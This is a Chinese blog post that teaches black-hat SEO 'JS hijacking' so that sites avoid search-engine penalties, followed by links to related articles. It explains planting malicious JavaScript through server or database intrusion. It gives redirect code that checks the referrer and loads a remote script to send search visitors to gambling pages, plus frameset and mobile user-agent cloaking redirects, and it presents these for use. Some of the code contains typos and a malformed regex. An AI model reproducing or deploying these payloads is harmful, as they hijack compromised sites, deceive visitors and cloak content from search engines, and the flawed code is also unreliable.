黑帽seo防止網站被k的js劫持跳轉代碼

2021-01-08 中華seo

由於目前搜尋引擎對於js代碼還沒有辦法完全識別,因此也就出現了利用js代碼跳轉的黑帽手法。現在網上有關js跳轉代碼比比皆是,但是作為黑帽的seo手法之一,如何做到有效降低跳轉的網站被k風險,這才是我們需要研究的一個方向。下面簡單分享一下有關js劫持的一些代碼,我了解到的只是皮毛,有不足之處歡迎各位同仁給予指導。本文的重頭戲將會在最後出現,請大家耐心往下看。js劫持主要有「伺服器劫持」以及「用戶端劫持」兩種。

「伺服器劫持」

伺服器劫持也稱為全局劫持,以修改網站動態語言文本,判斷訪問來源控制返回內容,從來達到網站劫持的目的。服務端劫持的判斷方法:可以通過觀察網站後端代碼,或者通過改變ip,包頭等方式,觀察放回源碼是否不同。也就是改變了每次訪問網頁從服務端獲取到的網頁代碼。

asp/aspx/php劫持

Global.asa、Global.asax、conn.asp、conn.php等文件比較特殊,作用是在每次執行一個動態腳本的時候,都會先加載該腳本, 然後再執行目標腳本。所以只要在 Global.asa 中寫判斷用戶系統信息的代碼(訪問來源等),如果是蜘蛛訪問則返回關鍵詞網頁(想要推廣的網站),如果是用戶訪問,則返回正常頁面。

「用戶端劫持」

客戶端劫持的手法也很多,但主要就是2種:Header劫持、js劫持。用戶端劫持的判斷方法:只需觀察瀏覽器呈現的網頁前端代碼,查看是否引用了不當的js,或者其它敏感內容。每次訪問網頁從服務端獲取到的網頁代碼都是相同的,只是控制了網頁代碼在瀏覽器中呈現的效果(比如是否進行跳轉等)。

1,header劫持

主要作用是:利用的就是Meta Refresh Tag(自動轉向),將流量引走。

可以在原始碼中寫入以下代碼:

<meta http-equiv=「refresh「 content=「10; url=http://www.xxx.com「>

2,js劫持

js劫持的作用:通過向目標網頁植入惡意js代碼,控制網站跳轉、隱藏頁面內容、窗口劫持等。

js植入手法:可以通過入侵伺服器,直接寫入原始碼中;也可以寫在資料庫中,因為有些頁面會呈現資料庫內容。

js劫持案例

我們經常看到的菠菜跳轉:通過搜尋引擎搜索點擊頁面(執行一段js)跳轉到博彩頁面;直接輸入網址訪問網頁,跳轉到404頁面。

代碼:today=new Date(); today=today.getYear()+"-"+(today.getMonth()+1)+"-"+today.getDate(); var regexp=//.(sogou|so|haosou|baidu|google|youdao|yahoo|bing|gougou|118114|vnet|360|ioage|sm|sp)(/.[a-z0-9/-]+){1,2}///ig; var where =document.referer; if(regexp.test(where)){ document.write ('<script language="javascript" type="text/javascript" src="http://www.xxx.com/test.js"></script>'); } else { window.location.href="../../404.htm"; }

分析:通過referer判斷來路,如果referer來路為空就是跳轉到404頁面,如果是搜尋引擎來的referer裡面也會有顯示,然後在寫代碼控制跳轉。如果只是控制實現顯示不同的內容,可以修改php、asp代碼;如果需要劫持搜尋引擎搜索框,可以寫JS代碼來做瀏覽器本地跳轉。當然js功能可以無限擴展,比如可以控制一個ip一天內第一次訪問正常,其餘訪問跳轉等等。

較有效的防k站js代碼

如何有效防止或者延長網站被k的js代碼,就目前來說,個人覺得還是一個比較可行的方法。方法是把pc端和手機端分開寫入js代碼,來實現跳轉。應用方法:加入一個Javascript源文件(以js為擴展名),將以下代碼添加在裡面,文件命名為tz,然後在網頁<head>下插入:<script src="js/tz.js></script>

網頁pc端跳轉

大家都知道,我們網站無論是整站優化還是單個頁面,當關鍵詞排名在首頁時,做黑帽手法的網站就可以考慮做跳轉到目標頁面了。為了獲取快速排名,所以做的頁面也大部分考慮給搜尋引擎看,應儘量做好內容的可讀性和規避相似度,來滿足搜尋引擎需求,這樣關鍵詞就會很快上首頁了。之後再做一個用戶體驗度較好的頁面,把流量自然跳轉到該頁面,這樣也就達到目的了。

代碼如下:

document.writeln("document.write(\"<frameset rows=\'100%,*\'frameborder=\'NO\'border=\'0\'framespacing=\'0\'>\");");

document.writeln("document.write(\"<frame name=\'main\'src=\'http://www.zhonghuaseo.com/jiqiao/'scrolling=yes>\");");

document.writeln("document.write(\"<\/frameset>\");");

document.writeln("<\/script>");

網頁手機端跳轉

道理和pc端一樣,我這裡就不囉嗦了。代碼如下:

<script type="text/javascript">

if(/Andorid|webOS|iPod|BlackBerry|Windows Phone/i.test(navigator.userAgent)){

if(window.location.href.indexOf("?pc")<0){try{window.location.href="http://www.zhonghuaseo.com/jiqiao/"}

catch(e){}}}</script>

注意點

值得注意的是,為了降低被k風險,我們做跳轉頁的時候儘量使主題和關鍵詞一致,內容則以引導性為主,頁面儘量優化好一點,提高用戶體驗度和降低跳出率,經測試此方法網站不容易被k,排名也比較穩定,當然,大家需要根據自己的實際情況來操作。

www.zhonghuaseo.com中華seo

相關焦點

  • 快速排名 讓人瘋狂的黑帽seo技術
    對於黑帽seo大家或許並不陌生,黑帽seo和白帽seo恰恰相反,是作弊手段。有白帽seo的時候,就有了黑帽seo一直到現在。但隔行如隔山這句話這句話一點都沒錯,再沒接觸黑帽seo技術之前我根本不知道黑帽seo能這麼快的排名。
  • 網站老是被劫持跳轉到其他網站怎麼辦
    越來越多的網站被劫持,像跳轉到彩piao網站,du博網站的情況時有發生,很多人可能都會經歷過,電腦打開網站,以及手機打開移動端網站都會跳轉到其他網站上去,這個就是網站被劫持跳轉,那麼網站被跳轉的背後究竟是因為什麼呢?
  • 揭秘黑帽SEO
    提到seo這個行業,大家中自然的都會想法快排、黑帽seo,很少人有耐心去喜歡白帽seo,黑帽SEO的操作也是一個讓人又愛又恨的SEO操作手法,因為很多人都想學黑帽SEO,想要通過短時間內把自己的網站做出有排名的效果。那麼什麼是黑帽SEO,接下來作者就和大家來揭秘一下黑帽SEO以及黑帽seo人員常用的操作方法。
  • 黑帽SEO與白帽SEO
    講完黑帽SEO講白帽,白帽SEO和黑帽相反,他是一種使用符合主流搜尋引擎發行方針規定的seo優化方法,手法很公平,因此,白帽SEO業內認為是最佳的SEO手法,它是在避免一切風險的情況下進行操作的,同時也避免了與搜尋引擎發行方針發生任何的衝突而被屏蔽。
  • 黑帽seo是什麼意思,常見的黑帽seo技術有哪些?
    1、黑帽seo是什麼意思?黑帽SEO技術是相對於白帽SEO技術而言的,從表面語義也可已看出,黑帽SEO就是通過作弊手段來實現自己的利益,如:提高自己網站排名、權重和流量。降低目標網站的排名權重和流量。顯而易見白帽SEO就是通過腳踏實地的進行網站SEO優化,使網站對搜尋引擎和用戶都能夠足夠友好,從而實現盈利。
  • 什麼是SEO中的白帽與黑帽,以及為什麼不推薦做黑帽?
    網站優化一、概念白帽,即通過正常的手段對網站內部優化(包括網站標題,網站結構,網站代碼網站內容,關鍵詞密度等)、網站外鏈的發布與建設,提高網站關鍵詞在搜尋引擎排名的一種seo技術。是搜尋引擎推薦和認可的。
  • 黑帽技術方法總結大全
    橋頁代碼如下:<me<me<me黑帽SEO方法三:隱藏連結(黑鏈)隱藏連結:通常也被稱之為黑鏈,也叫暗鏈、隱鏈;指的是正常的連結通過一些方法,如:把連結放入js代碼中,使用display:none等等,從而使用戶在正常瀏覽網頁的時候無法看到這個連結。
  • 白帽seo與黑帽seo
    當你遵循搜尋引擎算法的實踐優化時,可以循序漸進的提升排名,同時在可用性方面獲得各種好處,例如,網站將加載更快、導航友好性提升,並最終將更多的潛在客戶轉化為客戶。關於黑帽seo和白帽seo,如果不熟悉這些術語,顯然是處於小白階段。黑帽手段一旦搜尋引擎察覺必定會遭到懲罰,因此掌握了解黑帽seo和白帽seo之間的區別,對於確保搜尋引擎排名,至關重要。
  • 紅客seo淺談網站被黑劫持到bc網站如何處理
    人活著總要有活著的價值,今天寫陋文一篇,請大家多多賜教,希望幫助那些對安全不了解的公司 同行解決網站被黑的情況。 就在前幾天我一個客戶找到我說他要做機械行業。很爽快,表示很喜歡。於是乎查詢了他那個行業的數據,並且也關注了客戶現在的網站。就在前幾天我突然發現他的網站跳轉到別的博彩網站。這個應該不是最新出現的去年就有類似的這種技術實現,大部分為BC行業的seo技術。
  • 主頁劫持怎麼解決,主頁劫持怎麼解決,4步掌握解決方法
    一、黑帽網站劫持分類 1:域名dns劫持 dns劫持是通過全國各地的dns運營商,如果你搞定了機房管理員,就可以任意跳轉或者分時段、分關鍵詞、指定網址跳到你想要的網址。當然各省、市的dns運營商不同,如果有人說可以劫持全省dns流量,還是有可信度的。
  • 百度seo快速排名優化,搜尋引擎快速排名推廣
    下面,介紹一些黑帽SEO常用的連結作弊伎倆: 頁面跳轉 利用Javascript或者其他技術,使用戶在到達頁面之後迅速跳轉到另一個頁面。
  • SEO面試題:簡述白帽、黑帽、灰帽的區別
    今天,小編來給大家講一講:簡述白帽、黑帽、灰帽的區別黑帽seo就是利用一些偽裝、欺詐和竊取的方式來優化自己的網站,其特點是能在短時間內使自己的網站得到很好的推廣,某些網站也能收取到一些暴利,但這裡我說的只是一些網站,並不是全部的網站。
  • 關於seo白帽、seo黑帽、seo灰帽優化的詳細介紹
    我們在做搜尋引擎的優化過程當中,經常會碰到有人會問,你們用的是白帽優化還是黑帽優化?在這裡今天就給大家具體講解下SEO優化當中存在的集中優化方式:SEO白帽、SEO灰帽、SEO黑帽。每種方式基本都有其獨特的特性,希望對於SEOER來說,在看到這篇文章之後,對於這塊的內容能有一個更深的認識。
  • 網站優化注意要點 網站優化中要注意哪些 網站優化做好這些就可以
    (調用代碼)-智推教育】27、網站文章標題以挖掘的長尾詞為主(內頁排名)28、網站後期會有準備裝https協議的前期內鏈寫法(//:wuhanseo.zhituiedu.com)29、網站內鏈布局常見操作
  • 交行手機銀行官網遭劫持 跳轉至廣告網站
    10月13日晚間消息,360安全衛士官方微博發布緊急通報稱,交通銀行的手機銀行官網(wap.95559.com.cn)忽然出現訪問跳轉情況。當用戶使用電腦訪問交行手機銀行時,頁面會跳轉到第三方網站的廣告頁面,使用手機則能正常訪問。360已通知交通銀行進行處理。
  • 又一個題外話(不是 ECharts),兩次撞見相同的網站劫持
    [捂臉]幾個月後的今天,我發現了單位網站中某篇文章中提到的一個域名,被騰訊網址安全檢測識別為「危險-網站含有違規內容」…巧合的是,這兩次事件,使用的是幾乎一模一樣的網站劫持手段——直接訪問域名正常,通過搜尋引擎訪問則跳轉菠菜網址……
  • 怎麼解決百度快照劫持的方法、百度快照劫持的處理方法及預防措施...
    其中百度快照劫持就是屬於黑帽SEO,就是黑客利用網站漏洞,入侵高權重網站空間,篡改頁面代碼造成的。現在這種已經很常見的,所以站長們一定要了解相關的知識,並且知道解決和防範。,對來路訪客進行判斷,如果是蜘蛛來訪,就利用另一套頁面進行替換,當用戶進行訪問的時候,打開頁面後短暫停留,就會跳轉到黑客推廣的頁面。
  • 防止網站被鏡像的方法
    </script>所以 <script>proxy2016 = false;</script> 代碼將被過濾掉,img 的 onerror 設置超時時間 3000 毫秒,將運行函數部分,檢測是否還存在 proxy2016 字符,如果沒有找到就會將主機的 URL 改為 www.你網站的域名.com;為了安全起見,將 js 部分可以使用 js 代碼混淆(
  • 部分使用CNZZ統計代碼的網站遭遇流量劫持災難
    最近,統計平臺CNZZ受到一些用戶的反饋,導入了站點統計代碼的站點訪問時,會發生「廣告彈倉」和「瀏覽器警告不安」的問題。針對該情況進行了技術排查後,發現是部分網絡運營商在其中進行流量劫持。一、運營商劫持一些不太好的運營商直接在路由交換層面解析cnzz的http信息,隨後加上不法(廣告詞、情色、賭錢)代碼連接,在寬帶運營商的遮蓋下,全部客戶都是遭受危害。
  • 通過seo優化提升網站權重很流量
    無論你是SEOer還是SEO新手,給你一個網站做SEO工作,你首先要對網站目前狀況進行全面診斷分析,才能開展下一步工作。這就是常言的:「知己知彼,百戰不殆!」 下面說下七個SEO診斷步驟,希望大家在對企業或個人網站診斷時有所幫助!